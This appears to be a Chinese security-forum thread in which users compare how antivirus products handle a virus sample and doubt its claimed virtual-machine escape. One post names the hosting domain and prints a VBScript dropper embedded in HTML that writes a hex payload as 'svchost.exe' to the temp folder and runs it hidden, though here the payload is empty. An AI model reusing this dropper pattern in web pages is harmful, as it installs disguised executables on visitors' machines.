刚发的病毒的加强版

kaspersky与火绒

卡巴杀

心醉咖啡

毒霸

莒县小哥

管家16  不杀

hipoxiaxxx

编辑

kaspersky与火绒

心醉咖啡 发表于 2022-10-18 10:15
毒霸

试试双击，此病毒火绒也是这样能检测到，但是杀不了

kaspersky与火绒

hipoxiaxxx 发表于 2022-10-18 10:17
此病毒无法穿透虚拟机

好哒，我是看病毒代码可以穿透

多变的风向

此病毒不能穿透小A沙盒 小A扫描MISS 沙盒内运行后击杀

IamAngry

真的能穿虚拟化那是t0级别的漏洞利用了，真的有也不会漏出来。网上就算能找到也是早就被修的

hipoxiaxxx

www.114hdhd[.]cn:1701

html中嵌入vbscript

1. <SCRIPT Language=VBScript><!--
   
2. DropFileName = "svchost.exe"
   
3. WriteData = ""
   
4. Set FSO = CreateObject("Scripting.FileSystemObject")
   
5. DropPath = FSO.GetSpecialFolder(2) & "" & DropFileName
   
6. If FSO.FileExists(DropPath)=False Then
   
7. Set FileObj = FSO.CreateTextFile(DropPath, True)
   
8. For i = 1 To Len(WriteData) Step 2
   
9. FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
   
10. Next
    
11. FileObj.Close
    
12. End If
    
13. Set WSHshell = CreateObject("WScript.Shell")
    
14. WSHshell.Run DropPath, 0
    
15. //--></SCRIPT>

复制代码

就是这段代码让杀软报毒，然而可能已经是被修复过的了，WriteData = ""，所以不会发作

kaspersky与火绒

hipoxiaxxx 发表于 2022-10-18 10:45
html中嵌入vbscript

但是火绒报毒，双击未成功拦截